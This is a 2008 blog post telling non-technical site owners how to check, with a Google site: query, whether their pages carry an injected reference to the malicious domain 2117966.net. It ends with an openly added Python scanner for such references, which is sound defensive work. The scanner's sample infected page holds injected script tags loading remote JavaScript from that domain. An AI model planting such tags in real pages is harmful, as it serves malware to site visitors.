A Dispatch


March 14, 2008

How to Know Your Web Site Has Been Cracked

[Updated: 15March2008 0932PDT]
Over the last couple of days, the malware industry (and thus its blogs, news releases, and such) has been waving its collective arms in the air about a significant number of web site infections—infections that cause unprotected and unpatched PCs that stop by to be loaded with all kinds of nasty crap. According to multiple sources, the infections number more than 10,000, spread primarily among otherwise trusted web sites.

Although this revelation is pretty shocking—because a visit to a regular, trusted site could lead to a bad moon rising—there was scant advice for the typical, non-technical web site manager on how to find out whether the crackers have infected his or her site. Most of the advice I did see appeared to be aimed at IT guys who closely monitor their web server activities as full-time jobs. Some of the affected sites, however, are mom-and-pop type web sites. And Mom doesn't know how to "run security scans to detect deficiencies in code" (advice from McAfee Avert Labs).

So, if you run a mom-and-pop web site, here is one way to begin your investigation, using (almost) everyone's old friend, Google.

Use the Google search facility to target your web site by name and for a string of characters that signal this particular infection. For example, to check this site (spamwars.com), enter the following search into the Google text box:

"2117966.net" site:spamwars.com

Observe the quotes around the evil dot-net domain name. Substitute your own domain name after site:. If you get the message that your search did not match any documents, you're probably in good shape (against this particular attack, that is). If, on the other hand, links to your site's pages come up, you've got some cleanup to do. Be sure to advise your web hosting service immediately. Even after you clean up, the Google cache will probably still contain pointers to your old, infected pages. You want to make sure that the active links to the current pages lead to cleanly served pages. Additionally, if your server caches search results (only your web service administrator knows for sure), you need to get those caches cleared.
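The Google query above only reveals pages that Google has already crawled and indexed. If you keep a copy of your site's files (or can download them from your host), you can check them directly for the same marker. The script below is added here as an illustration and is not part of the original post: it walks a directory of published pages and reports every script, iframe, object or link that points at the domain named above, and also any inline script body that mentions it. The sample pages, the file name "constructed-payload.js" and the temporary directory layout are constructed for the example.

```python
import os
import re
import tempfile
from html.parser import HTMLParser
from pathlib import Path

# Domain the post names as the marker for this particular infection.
SUSPECT_DOMAINS = {"2117966.net"}

# Constructed sample pages (not taken from any real site).
CLEAN_PAGE = """<html><head><title>Mom and Pop Bakery</title>
<script src="/js/menu.js"></script></head>
<body><p>Welcome!</p></body></html>"""

INFECTED_PAGE = """<html><head><title>Mom and Pop Bakery</title>
<script src="/js/menu.js"></script></head>
<body><p>Welcome!</p>
<script src="http://www.2117966.net/constructed-payload.js"></script>
<script>var loader = "http://2117966.net/" + "x.js";</script>
</body></html>"""


class _RefCollector(HTMLParser):
    """Collect every external reference (src/href/data attributes) with its
    line number, plus the body of every inline <script> element."""

    def __init__(self):
        super().__init__()
        self.refs = []        # (line, tag, url)
        self.inline = []      # (line, script text)
        self._in_script = False
        self._script_line = 0

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        for key in ("src", "href", "data"):
            if a.get(key):
                self.refs.append((self.getpos()[0], tag, a[key]))
        if tag == "script":
            self._in_script = True
            self._script_line = self.getpos()[0]

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # html.parser hands script bodies to handle_data as raw text.
        if self._in_script and data.strip():
            self.inline.append((self._script_line, data))


def _host(url):
    """Return the host part of an absolute or protocol-relative URL, else None."""
    m = re.match(r"^(?:https?:)?//([^/:?#]+)", url.strip(), re.I)
    return m.group(1).lower() if m else None


def find_injected_refs(html, suspects=SUSPECT_DOMAINS):
    """Return (line, kind, evidence) for each reference to a suspect domain.
    URL hosts are matched exactly or as a subdomain; inline script bodies are
    checked by substring because droppers often assemble the URL at runtime."""
    p = _RefCollector()
    p.feed(html)
    out = []
    for line, tag, url in p.refs:
        h = _host(url)
        if h and any(h == s or h.endswith("." + s) for s in suspects):
            out.append((line, tag, url))
    for line, text in p.inline:
        if any(s in text.lower() for s in suspects):
            out.append((line, "inline-script", text.strip()[:80]))
    return out


def scan_tree(root, suspects=SUSPECT_DOMAINS):
    """Map each infected file under root to its findings."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.suffix.lower() in {".html", ".htm", ".php", ".asp", ".aspx"}:
            found = find_injected_refs(path.read_text(errors="replace"), suspects)
            if found:
                hits[str(path)] = found
    return hits


def demo():
    """Write the constructed pages to a temp directory and scan it."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "index.html"), "w") as f:
        f.write(INFECTED_PAGE)
    with open(os.path.join(root, "about.html"), "w") as f:
        f.write(CLEAN_PAGE)
    return {os.path.basename(k): v for k, v in scan_tree(root).items()}


if __name__ == "__main__":
    for name, findings in demo().items():
        for line, kind, evidence in findings:
            print(f"{name}:{line}: {kind}: {evidence}")
```

Run it against the directory your pages live in (scan_tree("/path/to/site")); every reported line is one you need to clean, and the same list tells your hosting service exactly where to look. If the query in the text turns up nothing but this scan does, the infected pages simply have not been re-crawled yet.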

The experts are still trying to uncover exactly how these corruptions are being accomplished (a PHP forum program is a current suspect, but ASP servers are also being affected by a different attack). However it's being done, don't feel that your site was specifically targeted. An infection of this magnitude was certainly an automated affair. Your site's underlying server software just happened to offer the open hole through which the crackers entered. Until that hole gets identified and plugged, your site will probably continue to be vulnerable (sigh).

It's bad enough that the crooks have destroyed email as a communications medium. Now they're going to impose fear in the everyday activity of surfing our favorite web sites. This could get very ugly.

Posted on March 14, 2008 at 04:44 PM